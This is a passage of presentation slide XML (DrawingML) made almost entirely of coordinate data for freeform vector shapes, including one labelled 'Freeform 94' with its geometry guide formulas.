                      <a:pt x="143" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8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088" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="425" y="2268"/>
                <a:ext cx="239" cy="148"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 734"/>
                  <a:gd name="T1" fmla="*/ 0 h 454"/>
                  <a:gd name="T2" fmla="*/ 0 w 734"/>
                  <a:gd name="T3" fmla="*/ 0 h 454"/>
                  <a:gd name="T4" fmla="*/ 0 w 734"/>
                  <a:gd name="T5" fmla="*/ 0 h 454"/>
                  <a:gd name="T6" fmla="*/ 0 w 734"/>
                  <a:gd name="T7" fmla="*/ 0 h 454"/>
                  <a:gd name="T8" fmla="*/ 0 w 734"/>
                  <a:gd name="T9" fmla="*/ 0 h 454"/>
                  <a:gd name="T10" fmla="*/ 0 w 734"/>
                  <a:gd name="T11" fmla="*/ 0 h 454"/>
                  <a:gd name="T12" fmla="*/ 0 w 734"/>
                  <a:gd name="T13" fmla="*/ 0 h 454"/>
                  <a:gd name="T14" fmla="*/ 0 w 734"/>
                  <a:gd name="T15" fmla="*/ 0 h 454"/>
                  <a:gd name="T16" fmla="*/ 0 w 734"/>
                  <a:gd name="T17" fmla="*/ 0 h 454"/>
                  <a:gd name="T18" fmla="*/ 0 w 734"/>
                  <a:gd name="T19" fmla="*/ 0 h 454"/>
                  <a:gd name="T20" fmla="*/ 0 w 734"/>
                  <a:gd name="T21" fmla="*/ 0 h 454"/>
                  <a:gd name="T22" fmla="*/ 0 w 734"/>
                  <a:gd name="T23" fmla="*/ 0 h 454"/>
                  <a:gd name="T24" fmla="*/ 0 w 734"/>
                  <a:gd name="T25" fmla="*/ 0 h 454"/>
                  <a:gd name="T26" fmla="*/ 0 w 734"/>
                  <a:gd name="T27" fmla="*/ 0 h 454"/>
                  <a:gd name="T28" fmla="*/ 0 w 734"/>
                  <a:gd name="T29" fmla="*/ 0 h 454"/>
                  <a:gd name="T30" fmla="*/ 0 w 734"/>
                  <a:gd name="T31" fmla="*/ 0 h 454"/>
                  <a:gd name="T32" fmla="*/ 0 w 734"/>
                  <a:gd name="T33" fmla="*/ 0 h 454"/>
                  <a:gd name="T34" fmla="*/ 0 w 734"/>
                  <a:gd name="T35" fmla="*/ 0 h 454"/>
                  <a:gd name="T36" fmla="*/ 0 w 734"/>
                  <a:gd name="T37" fmla="*/ 0 h 454"/>
                  <a:gd name="T38" fmla="*/ 0 w 734"/>
                  <a:gd name="T39" fmla="*/ 0 h 454"/>
                  <a:gd name="T40" fmla="*/ 0 w 734"/>
                  <a:gd name="T41" fmla="*/ 0 h 454"/>
                  <a:gd name="T42" fmla="*/ 0 w 734"/>
                  <a:gd name="T43" fmla="*/ 0 h 454"/>
                  <a:gd name="T44" fmla="*/ 0 w 734"/>
                  <a:gd name="T45" fmla="*/ 0 h 454"/>
                  <a:gd name="T46" fmla="*/ 0 w 734"/>
                  <a:gd name="T47" fmla="*/ 0 h 454"/>
                  <a:gd name="T48" fmla="*/ 0 w 734"/>
                  <a:gd name="T49" fmla="*/ 0 h 454"/>
                  <a:gd name="T50" fmla="*/ 0 w 734"/>
                  <a:gd name="T51" fmla="*/ 0 h 454"/>
                  <a:gd name="T52" fmla="*/ 0 w 734"/>
                  <a:gd name="T53" fmla="*/ 0 h 454"/>
                  <a:gd name="T54" fmla="*/ 0 w 734"/>
                  <a:gd name="T55" fmla="*/ 0 h 454"/>
                  <a:gd name="T56" fmla="*/ 0 w 734"/>
                  <a:gd name="T57" fmla="*/ 0 h 454"/>
                  <a:gd name="T58" fmla="*/ 0 w 734"/>
                  <a:gd name="T59" fmla="*/ 0 h 454"/>
                  <a:gd name="T60" fmla="*/ 0 w 734"/>
                  <a:gd name="T61" fmla="*/ 0 h 454"/>
                  <a:gd name="T62" fmla="*/ 0 w 734"/>
                  <a:gd name="T63" fmla="*/ 0 h 454"/>
                  <a:gd name="T64" fmla="*/ 0 w 734"/>
                  <a:gd name="T65" fmla="*/ 0 h 454"/>
                  <a:gd name="T66" fmla="*/ 0 w 734"/>
                  <a:gd name="T67" fmla="*/ 0 h 454"/>
                  <a:gd name="T68" fmla="*/ 0 w 734"/>
                  <a:gd name="T69" fmla="*/ 0 h 454"/>
                  <a:gd name="T70" fmla="*/ 0 w 734"/>
                  <a:gd name="T71" fmla="*/ 0 h 454"/>
                  <a:gd name="T72" fmla="*/ 0 w 734"/>
                  <a:gd name="T73" fmla="*/ 0 h 454"/>
                  <a:gd name="T74" fmla="*/ 0 w 734"/>
                  <a:gd name="T75" fmla="*/ 0 h 454"/>
                  <a:gd name="T76" fmla="*/ 0 w 734"/>
                  <a:gd name="T77" fmla="*/ 0 h 454"/>
                  <a:gd name="T78" fmla="*/ 0 w 734"/>
                  <a:gd name="T79" fmla="*/ 0 h 454"/>
                  <a:gd name="T80" fmla="*/ 0 w 734"/>
                  <a:gd name="T81" fmla="*/ 0 h 454"/>
                  <a:gd name="T82" fmla="*/ 0 w 734"/>
                  <a:gd name="T83" fmla="*/ 0 h 454"/>
                  <a:gd name="T84" fmla="*/ 0 w 734"/>
                  <a:gd name="T85" fmla="*/ 0 h 454"/>
                  <a:gd name="T86" fmla="*/ 0 w 734"/>
                  <a:gd name="T87" fmla="*/ 0 h 454"/>
                  <a:gd name="T88" fmla="*/ 0 w 734"/>
                  <a:gd name="T89" fmla="*/ 0 h 454"/>
                  <a:gd name="T90" fmla="*/ 0 w 734"/>
                  <a:gd name="T91" fmla="*/ 0 h 454"/>
                  <a:gd name="T92" fmla="*/ 0 w 734"/>
                  <a:gd name="T93" fmla="*/ 0 h 454"/>
                  <a:gd name="T94" fmla="*/ 0 w 734"/>
                  <a:gd name="T95" fmla="*/ 0 h 454"/>
                  <a:gd name="T96" fmla="*/ 0 w 734"/>
                  <a:gd name="T97" fmla="*/ 0 h 454"/>
                  <a:gd name="T98" fmla="*/ 0 w 734"/>
                  <a:gd name="T99" fmla="*/ 0 h 454"/>
                  <a:gd name="T100" fmla="*/ 0 w 734"/>
                  <a:gd name="T101" fmla="*/ 0 h 454"/>
                  <a:gd name="T102" fmla="*/ 0 w 734"/>
                  <a:gd name="T103" fmla="*/ 0 h 454"/>
                  <a:gd name="T104" fmla="*/ 0 w 734"/>
                  <a:gd name="T105" fmla="*/ 0 h 454"/>
                  <a:gd name="T106" fmla="*/ 0 w 734"/>
                  <a:gd name="T107" fmla="*/ 0 h 454"/>
                  <a:gd name="T108" fmla="*/ 0 w 734"/>
                  <a:gd name="T109" fmla="*/ 0 h 454"/>
                  <a:gd name="T110" fmla="*/ 0 w 734"/>
                  <a:gd name="T111" fmla="*/ 0 h 454"/>
                  <a:gd name="T112" fmla="*/ 0 w 734"/>
                  <a:gd name="T113" fmla="*/ 0 h 454"/>
                  <a:gd name="T114" fmla="*/ 0 w 734"/>
                  <a:gd name="T115" fmla="*/ 0 h 454"/>
                  <a:gd name="T116" fmla="*/ 0 w 734"/>
                  <a:gd name="T117" fmla="*/ 0 h 4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34"/>
                  <a:gd name="T178" fmla="*/ 0 h 454"/>
                  <a:gd name="T179" fmla="*/ 734 w 734"/>
                  <a:gd name="T180" fmla="*/ 454 h 45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34" h="454">
                    <a:moveTo>
                      <a:pt x="0" y="395"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
